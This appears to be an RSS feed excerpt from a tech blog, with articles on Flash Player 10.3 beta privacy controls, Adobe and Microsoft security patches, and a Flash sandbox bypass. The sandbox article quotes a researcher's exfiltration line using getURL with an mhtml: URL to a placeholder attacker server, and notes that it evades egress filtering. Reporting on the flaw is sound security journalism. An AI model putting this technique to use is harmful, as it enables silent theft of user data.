href="http://labs.adobe.com/technologies/flashplatformruntimes/flashplayer10-3/">lists</a> the following new features of Flash Player 10.3:</p><ul><li>Media Measurement</li><li>Acoustic Echo Cancellation</li><li>Integration with browser privacy control for local storage</li><li>Native Control Panel</li><li>Auto-Update Notification for Mac OS</li></ul><p>The most interesting new feature from a privacy and security standpoint is called &#8220;integration with browser privacy control for local storage&#8221;.</p><p>Web browsers up until now did not have an option to delete local Flash storage, commonly referred to as <a
href="http://www.ghacks.net/2007/05/04/flash-cookies-explained/">Flash cookies</a>. Users either had to use Adobe&#8217;s inflexible <a
href="http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html">online control</a> panel, third party software or manual options to remove Flash data from the system (see <a
href="http://www.ghacks.net/2009/10/25/four-options-to-deal-with-flash-cookies/">Four Options To Deal With Flash Cookies</a>).</p><p>Adobe started to integrate access to local storage, or more precisely the ability to clear local storage, directly in the web browser with the latest beta release of Flash. The release notes state that it will be available first in Mozilla Firefox 4 and Internet Explorer 8, and at a later point in time released for Apple Safari and Google Chrome. The document does not mention the Opera web browser at all.</p><p>The current beta version does not seem to add the controls to the web browsers yet. A test with the latest Firefox 4 Minefield release revealed no new options. Adobe states that the integration with Internet Explorer is not available yet as well, but will be enabled in a future beta update.</p><p>The feature itself improves the privacy of the user. That&#8217;s great. It is not so great that Adobe does not seem to have it included at all in the first beta version of the browser.</p><p>The Native Control Panel is the second addition for Windows, Mac and Linux; It improves the management of Flash settings on those operating systems. Flash Player 10.3 will add controls to manage privacy, security and storage settings directly in the control panels of the operating systems. That feature however is not enabled in the beta as well.</p><p>Media Measurement provides integration of video analytics into Flash which gives companies and producers information about the audience and video distribution.</p><p>Acoustic Echo Cancellation gives developers additional options at hand to improve peer-to-peer communication with Flash Player. New features include noise suppression, voice activity detection, acoustic echo cancellation and automatic compensation for microphone input levels.</p><h3>Verdict</h3><p>The new Flash Player features look might fine on paper, but since half of them are developer features that need to be added to flash contents, and the other half features that are not enabled yet, it makes little sense for end users to download and install Flash Player 10.3 beta.</p><p>If you do not want to wait, <a
href="http://labs.adobe.com/downloads/flashplayer10-3.html">you find</a> downloads for all Flash Player 10.3 beta releases at Adobe Labs.</p><p><strong>Update:</strong> The Flash Player Settings Manager appeared in the Control Panel after uninstalling and installing the latest Flash Player beta and restarting the Pc.</p><p>The applet Flash Player (32-bit) consists of the four tabs Storage, Camera and Mic, Playback and Advanced. Take a look at the screenshots below for a first impression of the feature.</p><p>The storage settings can be configured in the Storage tab. Here it is possible to allow or block all sites, or configure Adobe Flash to always ask when a site wants to save information on the computer. The button Locale Storage Settings by Site opens a new window that lists all websites and servers that are storing data on the PC. Options available there are to delete individual entries and to change the permissions of the host. The Delete all button in the main interface deletes all data that is currently stored on the system.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/03/flash-player-settings-manager.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/03/flash-player-settings-manager.jpg" alt="flash player settings manager" title="flash player settings manager" width="471" height="426" class="alignnone size-full wp-image-42266" /></a></p><p>Camera and Mic allows to block all sites from using the camera and microphone or configure Flash Player to ask whenever a site wants to access the devices. The Camera and Microphone Settings by Site button opens a new window to allow or block access from specific sites.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/03/camera-mic-flash.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/03/camera-mic-flash.jpg" alt="camera mic flash" title="camera mic flash" width="471" height="426" class="alignnone size-full wp-image-42268" /></a></p><p>Peer-assisted networking is configured under Playback. Here it is possible to block all sites from using peer-assisted networking. The default setting displays a confirmation dialog whenever a site wants to make use of the technology. It is again possible to configure rules for specific sites with a click on the Peer-assisted Networking Settings by Site button.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/03/playback-settings.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/03/playback-settings.jpg" alt="playback settings" title="playback settings" width="471" height="426" class="alignnone size-full wp-image-42269" /></a></p><p>The advanced settings finally display a Delete All button to delete all local storage, saved choices, settings and other data used by content in Flash Player across all browsers on the computer. It is possible to change the update settings from automatic updates to never check for updates. The Check Now button can be used to check for updates manually.</p><p>The two remaining options are to specify trusted location settings for developer testing, and to deauthorize the computer which prevents Flash from playing previously viewed protected contents.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/03/flash-player-control-panel.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/03/flash-player-control-panel.jpg" alt="flash player control panel" title="flash player control panel" width="471" height="426" class="alignnone size-full wp-image-42270" /></a></p><p>Adobe has placed several web links in the control panel applet that open documentation pages. Follow <a
href="http://help.adobe.com/en_US/FlashPlayer/10.3/NCP/WS6aa5ec234ff3f285139dc56112e3786b68c-8000.html">this link</a> to open the start page of the Native Control Panel documentation.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/03/08/a-close-look-at-adobe-flash-player-10-3-beta/feed/</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>Adobe Security Bulletin Summary Feburary 2011</title><link>http://www.ghacks.net/2011/02/09/adobe-security-bulletin-summary-feburary-2011/</link> <comments>http://www.ghacks.net/2011/02/09/adobe-security-bulletin-summary-feburary-2011/#comments</comments> <pubDate>Wed, 09 Feb 2011 08:23:40 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Software]]></category> <category><![CDATA[adobe acrobat]]></category> <category><![CDATA[adobe flash player]]></category> <category><![CDATA[adobe reader]]></category> <category><![CDATA[adobe security]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=39719</guid> <description><![CDATA[Adobe Software yesterday released updates for some of its popular software applications, including updates for Adobe Reader, Acrobat and the Adobe Flash Player. The updates address critical security issues in the products making them mandatory updates for all users of said products. The security update for Adobe Flash Player fixes several critical vulnerability in Flash [...]]]></description> <content:encoded><![CDATA[<p>Adobe Software yesterday released updates for some of its popular software applications, including updates for Adobe Reader, Acrobat and the Adobe Flash Player. The updates address critical security issues in the products making them mandatory updates for all users of said products.</p><p>The security update for Adobe Flash Player fixes several critical vulnerability in Flash Player 10.1.102.64 and earlier on Windows, Macintosh, Linux and Solaris. Successful exploits could &#8220;cause the application to crash and could potentially allow an attacker to take control of the affected system&#8221;.</p><p>The update increases the version of the application to Adobe Flash Player 10.2.152.26 on all affected systems.</p><p>The update can be downloaded <a
href="http://get.adobe.com/flashplayer/">directly</a> from Adobe.</p><p>More information about the update are <a
href="http://www.adobe.com/support/security/bulletins/apsb11-02.html">available</a> on Adobe&#8217;s Security Bulletin page.</p><h3>Adobe Reader, Acrobat</h3><p>Critical vulnerabilities have also been identified in Adobe Reader and Acrobat. Affected versions include Adobe Reader X, Adobe Reader 9.4.1 for Windows, Macintosh and Unix, and Adobe Acrobat X and earlier for Windows and Macintosh. Please note that the update incorporates the Adobe Flash Player update.</p><p>The vulnerabilities &#8220;could cause the application to crash and potentially allow an attacker to take control of the affected system. Risk for Adobe Reader X users is significantly lower, as none of these issues bypass Protected Mode mitigations&#8221;.</p><p>Updates are available to increase the version of Adobe Reader X to 10.0.1, Adobe Reader 9.4.1 to 9.4.2 and Adobe Acrobat X to 10.0.1.</p><p>Download links for all affected applications are <a
href="http://www.adobe.com/support/security/bulletins/apsb11-03.html">posted</a> on the security bulletin page over at Adobe.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/02/09/adobe-security-bulletin-summary-feburary-2011/feed/</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Microsoft, Adobe Post February 2011 Patch Day Information</title><link>http://www.ghacks.net/2011/02/05/microsoft-adobe-post-february-2011-patch-day-information/</link> <comments>http://www.ghacks.net/2011/02/05/microsoft-adobe-post-february-2011-patch-day-information/#comments</comments> <pubDate>Sat, 05 Feb 2011 09:46:32 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe reader]]></category> <category><![CDATA[adobe security]]></category> <category><![CDATA[microsoft security]]></category> <category><![CDATA[patch day]]></category> <category><![CDATA[patch tuesday]]></category> <category><![CDATA[windows patches]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=39608</guid> <description><![CDATA[Patch Tuesday is coming up and Microsoft has released an advanced notification about the upcoming security patches. Patch Tuesday refers to the second Tuesday of each month on which security patches are released to the public. The Microsoft Security Bulletin Advance Notification for February 2011 details the upcoming patches. A total of 12 security bulletins [...]]]></description> <content:encoded><![CDATA[<p>Patch Tuesday is coming up and Microsoft has released an advanced notification about the upcoming security patches. Patch Tuesday refers to the second Tuesday of each month on which security patches are released to the public.</p><p>The Microsoft Security Bulletin Advance Notification for February 2011 details the upcoming patches. A total of 12 security bulletins are released next Tuesday of which all but one fix issues in the Microsoft Windows operating system. The remaining patch fixes a vulnerability in Microsoft Office.</p><p>Three of the security vulnerabilities have received a maximum severity rating of critical, the highest available rating, the remaining nine a severity rating of important.</p><ul><li>Microsoft&#8217;s newest operating system Windows 7 is affected by seven of the twelve issues. Of those, two are rated critical and the remaining five as important.</li><li>Windows Vista is affected by six vulnerabilities with three rated as critical and the remaining three as important.</li><li>Windows XP is affected by eight vulnerabilities with two being rated as critical and six as important.</li><li>Windows Server 2003 is affected by 10 vulnerabilities of which one is critical, eight are important and one is moderate.</li><li>Windows Server 2008 is affected in the same way as the Vista operating system, with the exception that one of the critical vulnerabilities is only rated as moderate here.</li><li>Windows Server 2008 R2 finally is affected the same way as Windows 7, again with the exception of two vulnerabilities that are rated as moderate instead of critical and important.</li></ul><p>The remaining vulnerabiliy affected Microsoft Visio 2002 Service Pack 2, Visio 2003 Service Pack 3 and Visio 2007 Service Pack 2. It is rated as important.</p><p>The advanced notifications are accessible <a
href="http://www.microsoft.com/technet/security/bulletin/ms11-feb.mspx">here</a>.</p><h3>Adobe</h3><p>Adobe has <a
href="http://www.adobe.com/support/security/bulletins/apsb11-03.html">released</a> a Prenotification Security Advisory for Adobe Reader and Acrobat.</p><blockquote><p>Adobe is planning to release updates for Adobe Reader X (10.0) for Windows and Macintosh, Adobe Reader 9.4.1 and earlier versions for Windows, Macintosh and UNIX, Adobe Acrobat X (10.0) for Windows and Macintosh, and Adobe Acrobat 9.4.1 and earlier versions for Windows and Macintosh to resolve critical security issues. Adobe expects to make updates for Windows and Macintosh available on Tuesday, February 8, 2011. An update for UNIX is expected to be available by the week of February 28, 2011.</p></blockquote><p>Expect lots of patching next Tuesday. We will post detailed information once the patches are released by Microsoft and Adobe.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/02/05/microsoft-adobe-post-february-2011-patch-day-information/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Adobe&#8217;s Flash Sandbox Not So Secure After All</title><link>http://www.ghacks.net/2011/01/15/adobes-flash-sandbox-not-so-secure-after-all/</link> <comments>http://www.ghacks.net/2011/01/15/adobes-flash-sandbox-not-so-secure-after-all/#comments</comments> <pubDate>Sat, 15 Jan 2011 10:00:51 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[flash player sandbox]]></category> <category><![CDATA[flash player security]]></category> <category><![CDATA[flash sandbox]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=38987</guid> <description><![CDATA[The idea on paper sounded great: Add a sandbox to Adobe Flash to prevent many attacks from affecting the underlying operating system. It appears however that the sandbox which has been introduced in December 2010 is not as effective as it could be. Security researcher Billy Rios discovered a way to bypass Adobe&#8217;s Flash Player [...]]]></description> <content:encoded><![CDATA[<p>The idea on paper sounded great: Add a sandbox to Adobe Flash to prevent many attacks from affecting the underlying operating system.  It appears however that the sandbox which has been introduced in December 2010 is not as effective as it could be. Security researcher <a
href="http://xs-sniper.com/blog/2011/01/04/bypassing-flash%E2%80%99s-local-with-filesystem-sandbox/">Billy Rios</a> discovered a way to bypass Adobe&#8217;s Flash Player sandbox locally.</p><p>He found out that SWFs that are loaded from a local file can in fact bypass the sandbox by passing &#8220;the contents to the attacker server via getURL() and a url like:  file://..&#8221;. That however can only be used to pass IPs and hostnames and no other data.</p><p>Data can however be send to a remote server on the Internet as well. A solution was quickly discovered; Adobe is blacklisting protocol handlers (<a
href="http://xs-sniper.com/blog/2010/10/18/pdf-rce-et-al-cve-2010-3625-cve-2010-0191-cve-2010-0045/">via</a>) which means that Flash Player will block some protocols (like JavaScript://) while allowing others (like mailto://). While it is theoretically possible to bypass the blacklist, an even easier solution is to find a protocol that is currently not included in the list.</p><p>Billy Rios found the mhtml protocol:</p><blockquote><p>There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example.  The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash.  Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:</p><p>getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);</p><p>Some other benefits for using the mhtml protocol handler are:</p><p>The request goes over http/https and port 80/443 so it will get past most egress filtering<br
/> If the request results in a 404, it will silently fail.  The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer<br
/> The protocol handler is available by default on Win7 and will launch with no protocol handler warning</p></blockquote><p>Attackers need to create a Flash file that they add the mhtml request to. Users then would need to execute the file on their computer system. How does it get there? For instance by email or as part of a virus attack. (<a
href="http://techie-buzz.com/tech-news/adobe-flash-sandbox-cracked.html?utm_source=feedburner&#038;utm_medium=feed&#038;utm_campaign=Feed%3A+techiebuzz+%28Techie+buzz%29">via</a>)</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/01/15/adobes-flash-sandbox-not-so-secure-after-all/feed/</wfw:commentRss> <slash:comments>4</slash:comments> </item> </channel> </rss>
